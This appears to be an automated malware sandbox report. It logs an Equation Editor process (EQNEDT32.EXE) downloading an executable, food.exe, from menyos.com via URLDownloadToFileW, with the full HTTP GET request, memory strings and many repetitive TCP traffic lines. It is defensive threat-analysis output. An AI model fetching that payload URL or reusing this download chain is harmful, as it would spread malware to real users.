Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 104.21.35.109:443 -> 192.168.2.22:49163

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /assets/home/js/bdg/food.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: menyos.comConnection: Keep-Alive

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036706E2 URLDownloadToFileW,

2_2_036706E2

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe

Jump to behavior

Source: global traffic

Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: menyos.com

Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com//m/
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/5m/
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exe
Source: EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exefj
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exej
Source: EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menyos.com/assets/home/js/bdg/food.exeuj
Source: EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163

Source: unknown

